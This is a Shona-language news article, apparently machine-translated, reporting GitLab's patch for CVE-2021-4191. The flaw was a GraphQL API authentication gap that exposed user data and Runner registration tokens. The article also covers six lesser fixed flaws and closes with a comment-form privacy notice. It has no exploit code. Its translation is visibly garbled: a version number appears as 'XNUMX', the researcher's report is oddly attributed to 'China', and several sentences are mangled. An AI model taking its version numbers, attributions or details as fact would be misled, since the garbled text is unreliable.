Yakagadzirisa kusagadzikana muGitLab iyo inobvumira kupinda kune Runner tokens

mazuva mazhinji apfuura GitLab yakavhurwa kuburikidza ne blog post kuti vatsvakurudzi vakaratidza ruzivo rwekusagadzikana chengetedzo ikozvino yakavharwa muGitLab, yakavhurika sosi DevOps software, iyo inogona kubvumira asina kutenderwa ari kure anorwisa kuti atore ruzivo rwemushandisi.

Kusagadzikana kukuru, uko kwatova yakanyoreswa seCVE-2021-4191, Zvinonzi zvakakonzerwa nekukanganisika kwepakati nepakati kunobata shanduro dzese dzeGitLab Nharaunda Edition uye Enterprise Edition kubva 13.0 uye ese mavhezheni kubva 14.4 uye kutanga kupfuura 14.8.

Anga ari Jake Baines, muongorori wezvekuchengetedzwa kwepamusoro paRapid7, uyo anonzi akawana nekutaura chikanganiso ichi, uyo mushure mekuburitswa pachena muna Mbudzi 18, 2021, akagadzirisa zvakaburitswa sechikamu chezvakaburitswa zvekuchengetedza kubva kuGitLab 14.8.2, 14.7.4. 14.6.5 uye XNUMX izvo inogona kubvumira mushandisi asina mvumo kuchera tokeni dzekunyoresa muGitLab Runner, iyo inoshandiswa kuronga vabati vekufona kana vachigadzira kodhi yeprojekiti mune inoenderera yekubatanidza system.

"Kusagadzikana imhaka yekushayikwa kwechokwadi cheki paunenge uchiita zvimwe zvikumbiro zveGitLab GraphQL API," Baines akadaro. yakataurwa mumushumo wakabudiswa neChina. "Asina kutenderwa ari kure anorwisa anogona kushandisa njodzi iyi kukohwa GitLab akanyoreswa mazita ekushandisa, mazita, uye email kero."

Pamusoro pezvo, zvinonzi kana uri kushandisa Kubernetes executors, iwe unofanirwa kugadzirisa nemaoko maHelm chart value. nechiratidzo chitsva chekunyoresa. 

Uye izvo zvezvigadziriso zvega zviitiko zvisiri mushanduro 14.6 kana gare gare, GitLab ine yakatumirwa zvigamba iyo inogona kushandiswa kudzikisira kuburitswa kweiyo Runner registration tokeni kuburikidza nekusagadzikana yezviito zvinokurumidza  Aya mapeche anofanirwa kutorwa senguva pfupi. Chero chiitiko cheGitLab chinofanirwa kuvandudzwa kuti chive chigamba vhezheni ye14.8.2, 14.7.4, kana 14.6.5 nekukurumidza.

Yakabudirira API leak kushandiswa inogona kubvumira vanoita hutsinye kuti vaverenge uye vanyore mazita emazita epamutemo epachinangwa. iyo inogona kushandiswa sechitubu chekuita kurwisa kwechisimba, kusanganisira kufungidzira password, kupfapfaidza password, uye credential stuffing.

"Ruzivo rwakaburitswa zvakare runogona kubvumira munhu anorwisa kuti agadzire mushandisi mutsva wemazwi zvichibva pane GitLab kumisikidzwa, kwete kubva kugitlab.com chete asiwo kubva kune zviuru makumi mashanu mamwe magitLab anowanika paInternet."

Inokurudzirwa kune vashandisi vanochengetedza yavo GitLab kumisikidzwa kuisa imwe update kana kuisa chigamba nekukasira. Nyaya iyi yakagadziriswa nekusiya mukana wekukurumidza kuita mirairo kune vashandisi vane mvumo yeKunyora.

Mushure mekuisa inogadziridza kana yemunhu "token-prefix" zvigamba, zvakambogadzirwa ma tokeni ekunyoresa emapoka nemapurojekiti muRunner anozogadzikiswa uye kuvandudzwa.

Pamusoro pekunetseka kwakanyanya, iwo mavhezheni matsva akaburitswa anosanganisirawo zvigadziriso kune 6 ine ngozi isina njodzi:

  • Kurwiswa kweDoS kuburikidza nemhinduro yekutumira sisitimu: nyaya muGitLab CE/EE inobata shanduro dzese kutanga ne8.15. Zvaigoneka kumisikidza DOS nekushandisa iyo math basa neformula chaiyo mumhinduro dzedambudziko.
  • Kuwedzera vamwe vashandisi kumapoka neasina rombo mushandisi: iyo inobata shanduro dzese dzisati dzasvika 14.3.6, shanduro dzese kubva 14.4 isati ya14.4.4, shanduro dzese kubva 14.5 pamberi 14.5.2. Mune mamwe mamiriro ezvinhu, iyo GitLab REST API inogona kubvumira vashandisi vasina rombo kuti vawedzere vamwe vashandisi kumapoka, kunyangwe izvo zvisingaite kuburikidza newebhu UI.
  • Kusaziva kwevashandisi kuburikidza nekunyengedza zvirimo muSnippets: inobvumira mutambi asina mvumo kuti agadzire Snippets ine zvinhu zvinonyengera, izvo zvinogona kunyengedza vashandisi vasingafungire kuita mirairo isina musoro.
  • Kudonha kwezvakasiyana nharaunda kuburikidza ne "sendmail" nzira yekuendesa: Kusimbisa kwekuisa zvisirizvo pane ese mavhezheni eGitLab CE/EE uchishandisa kutumira email kutumira maemail kunobvumira mutambi asina mvumo kuba zvinosiyana nharaunda kuburikidza neakagadziridzwa email kero.
  • Kusarudza kuvapo kwemushandisi kuburikidza neGraphQL API: Yakavanzika GitLab zviitiko zvine maregistries angangove panjodzi yekuverengerwa kwevashandisi nevashandisi vasina kutenderwa kuburikidza neGraphQL API.
  • password inovuza kana uchiratidzira repositori kuburikidza neSSH mukudhonza mode 

Finalmente kana iwe uchifarira kuziva zvakawanda nezvazvo, unogona kutarisa ruzivo mu inotevera chinongedzo.


Izvo zviri muchinyorwa zvinoomerera pamisimboti yedu ye tsika dzekunyora. Kuti utaure chikanganiso tinya pano.

Iva wekutanga kutaura

Siya yako yekutaura

Your kero e havazobvumirwi ichibudiswa.

*

*

  1. Inotarisira data: AB Internet Networks 2008 SL
  2. Chinangwa cheiyo data: Kudzora SPAM, manejimendi manejimendi.
  3. Legitimation: Kubvuma kwako
  4. Kutaurirana kwedata
  5. Dhata yekuchengetedza: Dhatabhesi inobatwa neOccentus Networks (EU)
  6. Kodzero: Panguva ipi neipi iwe unogona kudzora, kupora uye kudzima ruzivo rwako